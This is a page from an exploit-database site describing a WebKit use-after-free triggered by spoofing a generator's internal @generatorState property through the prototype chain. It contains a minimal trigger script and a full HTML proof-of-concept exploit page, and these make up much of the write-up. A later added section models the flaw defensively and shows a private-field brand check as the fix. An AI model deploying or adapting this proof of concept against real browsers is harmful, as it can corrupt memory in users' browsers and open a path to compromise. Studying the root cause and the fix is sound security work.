0day.today - Biggest Exploit Database in the World.
WebKit - Use-After-Free when Resuming Generator Exploit
Security Risk: Medium
In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState, is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:

```javascript
var state = this.@generatorState;
```

and set by calling:

```javascript
generator.@generatorState = @GeneratorStateExecuting;
```

Checking that the @generatorState property is set is also used in place of type checking the generator. Therefore, if Generator.next is called on an object whose prototype is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState is set, it is set as an own property on the object, not on the prototype. This allows the creation of non-Generator objects with @generatorState set to completed. It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then read the object's own @generatorState property, while the other internal properties will come from the prototype. Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after-free.

A minimal sample of the script causing this problem is below, and a full PoC is attached.

```javascript
var iterator;
var a = [];

function* foo(index) {
  while (1) {
    var q = a.pop();
    if(q){
      q.__proto__ = iterator;
      q.next();
    }
    yield index++;
  }
}

function* foo2(){
  yield;
}

var temp = foo2(0);
for(var i = 0; i < 10; i++){
  // make a few objects with @generatorState set
  var q = {};
  q.__proto__ = temp;
  q.next();
  q.__proto__ = {};
  a.push(q);
}

iterator = foo(0);
var q = {};
q.__proto__ = iterator;
print(q.next().value);
```

Full PoC:

```html
<html><body><script>
print = console.log;
print("top");
var iterator;
var o = function(){print("hello")};
var a = [];

function* foo(index) {
  //print("start");
  while (1) {
    //if(index == 77){
    // o = 0;
    // gc();
    // index = 2;
    // var a = [1, 2, 3, 4];
    //yield 9;
    //print("a vale " + a[0]);
    //}
    //if(index == 1){
    //index = 77;
    // print("INTERNAL CALL")
    // iterator.next();
    //index++;
    //}
    //var b = [1, 2, 3, 4];
    var q = a.pop();
    if(q){
      print("here1");
      q.__proto__ = iterator;
      q.next();
    }
    yield index++;
    //print("bval" + b[0]);
  }
}

function* foo2(){
  yield;
}

var temp = foo2(0);
for(var i = 0; i < 10; i++){
  var q = {};
  q.__proto__ = temp;
  q.next();
  q.__proto__ = {};
  a.push(q);
}
//print(a);

iterator = foo(0); // expected output: 0
o.__proto__ = iterator;
//print("FIRST CALL")
//print(o.next().value);
//print("SECOND CALL")
//print(o.next().value);
//print("THIRD CALL")
for(var i = 0; i < 10; i++){
  var q = {};
  q.__proto__ = iterator;
  print(q.next("hello").value);
}
//print("FOURTH CALL")
//print(iterator.next().value);
o();
</script></body></html>
```

# 0day.today [2024-06-23] #
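The root cause described above is a general JavaScript pitfall: a "type check" that only asks whether a property resolves on the receiver is satisfied by any object whose prototype chain reaches a genuine instance, and a state write-back then lands on the receiver as an own property while the remaining internals are still read from the prototype. The following is an added example, not code from the 0day.today page or from WebKit, that models that pattern in plain JavaScript and contrasts it with a brand check built on a private field, which the engine never resolves through the prototype chain. All class and function names (`WeakResumable`, `weakResume`, `StrongResumable`) are hypothetical.

```javascript
// Added example (hypothetical names): the weak check the write-up describes
// versus a brand check that cannot be satisfied by inheritance.

// Weak version: state and "frame" are ordinary properties, so both are
// reachable through the prototype chain from any object inheriting from an instance.
class WeakResumable {
  constructor() {
    this.state = "suspended";
    this.frame = { inUse: false };   // stands in for the generator's execution state
  }
}

function weakResume(obj, body) {
  // Type check by presence only, as in the write-up: it passes for an impostor.
  if (obj.state === undefined) throw new TypeError("not a resumable");
  // Recursion guard reads whatever `state` resolves to on the receiver.
  if (obj.state === "executing") throw new Error("recursion blocked");
  obj.state = "executing";           // becomes an OWN property of the receiver
  const frame = obj.frame;           // inherited: the same frame the prototype is using
  const reentrant = frame.inUse;     // true when the frame is already mid-execution
  frame.inUse = true;
  try {
    return body(reentrant);
  } finally {
    frame.inUse = false;
    obj.state = "suspended";
  }
}

// Returns true: the guard is bypassed and the shared frame is re-entered.
function demonstrateWeak() {
  const real = new WeakResumable();
  return weakResume(real, () => {
    const impostor = Object.create(real);  // inherits state ("executing") and frame
    impostor.state = "suspended";          // own property shadows the prototype's state
    return weakResume(impostor, (reentrant) => reentrant);
  });
}

// Strong version: the state lives in a private field. Reading `this.#state` on an
// object that was not constructed by this class throws a TypeError, and the
// prototype chain is not consulted, so inheriting from an instance does not help.
class StrongResumable {
  #state = "suspended";

  resume(body) {
    if (this.#state === "executing") throw new Error("recursion blocked");  // brand check + guard
    this.#state = "executing";
    try {
      return body();
    } finally {
      this.#state = "suspended";
    }
  }
}

// Returns "TypeError": resume() is reachable through the prototype, but the
// receiver fails the brand check before any state is touched.
function demonstrateStrong() {
  const real = new StrongResumable();
  return real.resume(() => {
    const impostor = Object.create(real);
    try {
      impostor.resume(() => "reentered");
      return "reentered";
    } catch (e) {
      return e.constructor.name;
    }
  });
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("weak check re-entered shared frame:", demonstrateWeak());
  console.log("strong check result:", demonstrateStrong());
}
```

The defensive takeaway is that an "is this one of ours?" check must be tied to something that cannot be inherited or shadowed: a private field, an internal slot, or at minimum an own-property test such as `Object.prototype.hasOwnProperty.call(obj, "state")` combined with reading every other internal from the same verified object rather than from whatever the prototype chain supplies.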